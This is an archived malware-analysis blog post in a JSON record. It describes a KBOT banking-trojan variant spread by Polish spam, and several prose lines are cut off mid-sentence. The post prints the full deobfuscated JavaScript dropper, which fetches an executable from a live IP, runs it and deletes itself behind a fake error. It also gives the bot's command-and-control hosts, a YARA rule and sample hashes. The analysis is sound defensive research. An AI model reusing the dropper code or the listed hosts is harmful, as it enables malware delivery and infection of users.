{
	"id": "f5b51224-f9fe-4b06-b2ee-bad2322357d2",
	"created_at": "2026-04-06T00:11:16.637635Z",
	"updated_at": "2026-04-10T03:21:45.264945Z",
	"deleted_at": null,
	"sha1_hash": "50f4873a42d73faeb860bf91b60a3957d1c0ccd9",
	"title": "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 49866,
	"plain_text": "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt\r\nArchived: 2026-04-05 17:12:20 UTC\r\nNewest addition to a happy family: KBOT\r\n---\r\nAt the beginning of May here in Poland we have a couple of free days. 3rd May is Constitution Day, and May 1\r\nMost of us use those days to unwind after winter, but some malware authors apparently didn't: a few weeks\r\nspreading some poorly obfuscated JavaScript and quite an interesting modification of KBOT from the Carberp lea\r\nSpam run.\r\n---\r\nIf you want to stay trendy, you have to follow the trendsetters, and in the malware world these days, these app\r\nSince they moved to spreading JavaScript files instead of .doc/.docm/.pdf.exe, the rest of the world has foll\r\nThe first payload is a JavaScript dropper, and it doesn't do anything except download the second stage in\r\nThe obfuscation used here is interesting but trivial to break.\r\nI came up with this nifty one-liner ;]\r\ncat Zamowienie.js | python2 -c 'import re,sys;print re.sub(r\"\\\\u00([a-f0-9]{2})\",lambda x: chr(int(x.group(1)\r\nAnd voila!\r\nvar obj_from = this['ActiveXObject'];\r\nvar obj_thousands7 = this['WScript'];\r\nvar obj_data6 = obj_thousands7['CreateObject']('WScript.Shell');\r\nvar fso12 = new obj_from('Scripting.FileSystemObject');\r\nvar obj_numerous = new obj_from('ADODB.Stream');\r\nvar obj_hundreds2 = new obj_from('Shell.Application');\r\nvar obj_radiofrequency10 = obj_data6['ExpandEnvironmentStrings']('%TEMP%');\r\nvar obj_since = obj_radiofrequency10 + '\\\\' + Math['floor']((Math['random']() * (40 + 10 + 50)) + 1) + '.exe';\r\nvar obj_they = new obj_from('Msxml2.ServerXMLHTTP');\r\nvar obj_find = '\\aflash_update.js';\r\nvar obj_from = obj_hundreds2['NameSpace'](3 + 2 + 2);\r\nvar flagme = false;\r\nvar okidoki = false;\r\nvar tone = 1;\r\nvar obj_including6 = null;\r\nvar obj_trigger = '';\r\nvar obj_practitioners2 = obj_thousands7['ScriptFullNam' + {\r\n Sc3: 'e'\r\n}.Sc3];\r\nvar obj_software = obj_from.Self.Path + obj_find;\r\nvar url12 = 'https://217.28.218.217/AE5600FFCBCC/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt';\r\nif ((obj_practitioners2 != obj_software) \u0026\u0026 (flagme == false)) {\r\n flagme = true;\r\n fso12['DeleteFile'](obj_practitioners2);\r\n obj_thousands7['echo']('The document is corrupted and cannot be opened');\r\n obj_thousands7['Sleep'](4000 + 4000);\r\n}\r\nwhile (true) {\r\n tone = tone + 1;\r\n if (tone == 300000000) {\r\n while (true) {\r\n try {\r\n obj_they['setOption'](3, 'MSXML');\r\n obj_they['open']('GET', url12 + '\u0026' + Math['floor']((Math['random']() * (200)) + 1), false);\r\n obj_they['send']();\r\n if (obj_they['status'] == (100 + 100)) {\r\n if (fso12['FileExists'](obj_since)) fso12['DeleteFile'](obj_since);\r\n obj_numerous['Open']();\r\n obj_numerous['Type'] = 1;\r\n obj_numerous['Write'](obj_they['responseBody']);\r\n obj_numerous['Position'] = 0;\r\n obj_numerous['SaveToFile'](obj_since);\r\n obj_numerous['Close']();\r\n obj_including6 = fso12['GetFile'](obj_since)['OpenAsTextStream'](1);\r\n if (fso12['FileExists'](obj_since) \u0026\u0026 obj_including6['ReadLine']()['substring'](0, 2) ==\r\n okidoki = true;\r\n obj_hundreds2['ShellExecute'](obj_since, '', '', 'open', '1');\r\n if (fso12['FileExists'](obj_thousands7['ScriptFullName']))\r\n fso12['DeleteFile'](obj_thousands7['ScriptFullName']);\r\n obj_thousands7['Sleep'](4000);\r\n if (fso12['FileExists'](obj_since)) fso12['DeleteFile'](obj_since);\r\n }\r\n obj_including6['Close']();\r\n }\r\n } catch (e) {}\r\n if (okidoki == true) {\r\n break;\r\n }\r\n obj_thousands7['Sleep'](10000 * 7);\r\n }\r\n break;\r\n }\r\n};\r\nSecond Stage, Malware.\r\n---\r\nAs mentioned above, this is a KBOT spin-off, and it looks like it's actively being developed and tested in p\r\nThe first version ate all my RAM and kept crashing and rebooting my system.\r\nHowever, it improved recently, and after a few iterations it is now much more stable.\r\nKBOT originally was a very simple user-mode downloader; the core of old ursnif/gozi2/isfb is my guess.\r\nThis malware has much more to offer though.\r\nThings that changed:\r\n- Tor support, yet no Tor found on the machine.\r\n- Removed GET parameters in favour of JSON-encoded POST data.\r\n- Much more complicated encryption schema (not fully reversed yet).\r\n- Addition of a mongoose HTTP server (why is it there?).\r\n- There are probably more changes, but I did only a preliminary analysis of this malware.\r\nWhat didn't change is how they store configuration data.\r\nOr maybe just a little bit: they added a big header in front, `BASECONFIG......` ;]\r\nAfter that we can find the typical FJ-struct:\r\n 00000000 fj_struct struc ; (sizeof=0x14, mappedto_188)\r\n 00000000 id dw ?\r\n 00000002 field_2 dw ?\r\n 00000004 offset dd ?\r\n 00000008 size dd ?\r\n 0000000C crc_tag dd ?\r\n 00000010 flags dd ?\r\n 00000014 fj_struct ends\r\nAnd the config with crc_tag == 0xefc75d60 is stored in plain text at the beginning of the .reloc section:\r\n {\r\n \"BotConfig\":\r\n {\r\n \"ServerPub\":\"44DCF35866EB4992264E809EDD001737C65E28BB4DAB8DC7DA5CFA7F1AA05619\",\r\n \"TaskPeriod\": 600,\r\n \"FailPeriod\": 600,\r\n \"BotCommunity\": \"group_102\",\r\n \"Hosts\":\r\n [\r\n \"mensabuxus.net\",\r\n \"ogrthuvwfdcfri5euwg.com\",\r\n \"ogrthuvfewfdcfri5euwg.com\"\r\n ]\r\n }\r\n }\r\nThe current version is 16777472, which I suppose can be transformed to 1.00.01.00, so it's brand new ;]\r\nFrom other notes, it looks like it's protected by Rovnix; there is some code for accessing hidden partitio\r\nbut it can be just leftovers from the original KBOT source code, since I didn't see any Rovnix-related code.\r\nOh, and this is the first malware I have seen implementing proper HMAC for messages, bravo!\r\nThis is just a heads-up article to inform you that there is a new interesting threat. I'm still working o\r\nOne last thing as a side note: it is quite interesting to see that ISFB, the most widespread banker in .pl, is bein\r\nI'm very curious to see which one will win the market ;]\r\nHere are some hashes and a YARA rule for the unpacked sample:\r\nrule kbot : banker\r\n{\r\n meta:\r\n author = \"mak\"\r\n module = \"kbot\"\r\n strings:\r\n $bot_cfg = \"BASECONFIG......FJ\"\r\n $injini = \"INJECTS.INI\"\r\n $kbotini = \"KBOT.INI\"\r\n $bot0 = \"BotConfig\"\r\n $bot1 = \"BotCommunity\"\r\n $push_version = { 5? 68 [4] 68 [4] 5? E8 [4] 83 C4 10 85 C0 0F }\r\n condition:\r\n all of them\r\n}\r\n62962da720d478bb3510dabc691db37df546749b440caa45d75d9fbfb69d82f9\r\n6e6ef05382010f857ecef17082e9c38b54133380f709b5b25e77afdcacf2b9ca\r\n12769a17f85a4c7d56cfe5754184db976b9a361dc7b5d2a8f50e82d7442651aa\r\n5eccbdae80a1c1e8cb8574986393fc958394b66978ec348d00afe3ec828d20ac\r\nSource: https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt"
	],
	"report_names": [
		"newest_addition_to_happy_family_kbot.17.05.2015.txt"
	],
	"threat_actors": [],
	"ts_created_at": 1775434276,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50f4873a42d73faeb860bf91b60a3957d1c0ccd9.pdf",
		"text": "https://archive.orkl.eu/50f4873a42d73faeb860bf91b60a3957d1c0ccd9.txt",
		"img": "https://archive.orkl.eu/50f4873a42d73faeb860bf91b60a3957d1c0ccd9.jpg"
	}
}